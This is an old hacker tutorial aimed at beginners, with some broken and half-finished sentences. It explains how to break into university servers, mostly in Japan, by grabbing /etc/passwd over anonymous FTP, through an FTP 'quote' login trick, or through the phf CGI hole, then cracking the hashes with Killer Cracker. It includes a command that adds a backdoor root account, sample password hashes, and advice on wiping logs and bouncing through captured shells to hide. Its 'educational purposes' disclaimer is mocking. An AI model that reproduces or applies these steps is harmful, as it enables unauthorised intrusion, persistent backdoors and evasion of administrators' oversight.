Web Page Hacking For Newbies
Visit Them At.
This guide was written in dedication of Samantha who showed me the right
path in life, the path to Satanism and Paganism, and she
And to the guy BliNdfire who absolutely had to know how to browser hack,
so here it is.
First of all you will need an ftp program such as ws_ftp. I use
downloadable at http://www.windows95.com it's real simple and easy to
so try it if you haven't dealt with ftp before. Now once you have
program find an address like http://www.shiga-pc.ac.jp you can find
addresses like this by going to a search engine such as AltaVista and
running a search for url:ac.jp this tells the search engine to give you
all the academic addresses in Japan ex. ac=academic jp=Japan
, you can
try this with any country ex. url:dk . But for now let's just
the Japanese servers. When u have an address (I would recommend making
list of about 100 and trying them all) go to your ftp program and type
the address ex. http://www.shiga-pc.ac.jp note.. You
will have to log in
anonymously. You should then get a list of folders on the
usr, pub,etc, dev, bin. See the etc folder? open it, once opened
see some files passwd and group, open or view the file passwd (this is
the passwords for the system are stored), you should hopefully get something
that looks like this.
root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:
uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
sso:Nologin:6:7:System Security Officer:/etc/security:
news:Nologin:8:8:USENET News System:/usr/spool/netnews:
sccs:PASSWORD HERE:9:10:Source Code Control:/:
ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh
rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
This means you've hit the jackpot, in this case you should get a password
cracker download one at (http://www.hackersweb.com go to the hacking
section), I would recommend for the beginning hacker to get a password
cracker such as killer cracker because it's extremely easy to use.
have downloaded killer cracker you will need a dictionary file
(get one at http://www.hackersweb.com look in the extra toolz section),
dictionary filez are better the bigger they are so I would recommend
getting one at around 10 MB or more. Now the passwords from the
file off the server you are hacking, you will need to save them to a file
and place them in the same directory as Killer Cracker, you will also
to have your dictionary file in the same directory. Now you are
go, just run killer cracker and tell it the name of the Pwfile=the password
file and the name of the word file=your dictionary file, the valid file
be the file where the output of the password cracker will be put just
it a name such as crack.txt. Once the cracker is done cracking the
files for you goto the valid file and take a look the file should look
something like this root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember this is an example). This file says that the username is root
and the password is rootif the file had been like this.
root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember again just an example) the login or username would be root and
the password would be dumbass, well that's it just ftp to the site using
the login and password. Note if you get root type in the following
you have logged in:- echo "myserver::0:0:Test User:/:/bin/csh">>etc\passwd
this will allow you to login to the server with 1:myserver so you
get the admin suspicious when they see people login as root. Hide
as much as possible, if you already have a shell then go through that
when loggin on, or telnet to the hacked site shell and then re-telnet
hacked shell using the hacked shell, if you see what I mean, so your who
appears as local host. Also get some c scripts which delete your
erases you off logs etc.
Now if you were not as lucky to get exactly the same password file as
in the example above then maybe you got something like this.
This means that the passwd file is shadowed, if this is the case then
welcome to the administrators world of trying to stop hackers, this is
where you cant really do anything. However there is one thing to
sometimes in very rare cases there may be a folder on the remote system
that can be accessed by an anonymous login called shadowed, shadow, or
secret if this is the case the password files should be in there,
congratulations. If there isn't a folder like this, and the
is shadowed then bad luck, go to the next address on your list.
Now that you have tried the first thing as shown above there are a couple
of other methods you may also want to try one is FTP hacking shown below.
Go to a dos prompt after you are connected to the internet .
ftp www.victim=the site address
server will ask for a username press enter
server will ask for a password press enter
at the prompt type quote user ftp
quote cwd ~root
quote pass ftp
If you get in make sure you delete the log file they might look at it
see that you were on. Once you get on the passwd file is in etc/passwd
type cd etc then type get passwd. If you have done the above right
server is old you will have root access. By the way root is the
security status you can have.
Another good way of getting root or a shell at least is through browser
hacking. Again well use Japanese educational servers as our target.
this you will need a browser such as Netscape or Internet Explorer, you
will also need a telnet program, you can either download a telnet program
at http://www.windows95.com or use the one that already comes with dos.
To access the telnet program that comes with dos go to your dos windows
type in telnet www.site.com the site.com stand for the site you
telnet to, it could be anything like www.geidai.ac.jp or
www.tulips.tsukuba.ac.jp . You will also need a cracker program
recommend using Killer Cracker and applying as above.
Next thing you do is open your browser and run a search for url:ac.jp
like explained above. Again I would recommend making a big list
targets. Now when you have your targets we address type it in your
and add this to it.
To all you out there who are slightly advanced, I know this is the phf
technique and it is virtually dead, but you'll be surprised where you
This technique of finding the password file was first used in November
on the fbi.gov webpage by a few hackers. It has been patched up by a lot
servers, so this won't work on something like www.nasa.gov or most of
www.*.com sites. But still works on many university servers outside
and the U.S.
O.K. Once the url is entered you will see a number of things:-
Cgi-bin/phf is not found on this server (the most common one)
You do not have permission to view cgi-bin/phf?/ on this server
There are a number of other things the server might say, but the thing
want it to say is this:-
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
smtp:cmvof:0:0:mail daemon user:/:
nobody:ccvjcvj:60001:60001:uid no b
This means you have hit the jackpot!!!
If you get something similar to this but all lines have something in
like the following:-
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
smtp:x:0:0:mail daemon user:/:
nobody:x:60001:60001:uid no b
(notice the c) if you don't know what this means it means the password
file is shadowed and you cannot work out ht epasswords for a shadowed
password file then you're in bad luck, I would recommend trying the ftp
hack prior to this for the best results.
If some but not all logins have a * in them then it's ok, it's worth
getting the ones which aren't shadowed, hey a shell is a shell!!!
If you want to use your newly acquired shells then telnet to the site
put in the login and the password (remember you have to crack the password
file first explained at the top).
Anyway that's it for now hope at least some people benefited from this
Please send Comments, Questions, and Death threats to. But please
mailbombs i feel so sorry for you when i have to fry your asses...
Or visit him at.
For the ultimate list of hacking guides and toolz of the trade.
Or you can find him on.
Chat.yahoo.com as AcidMeister the one and only.
This is for Educational purposes only it should not be used as a guide
cause havoc or to hack. He He He, good luck!!! And don't get caught.
would hate to see you in a cell with your 300 pound Bruno The Gay Ax
murderer. He He He.
This was written in Word Pad so if you have any problems let me know...
Copyright © AcidMeister...
Back To Index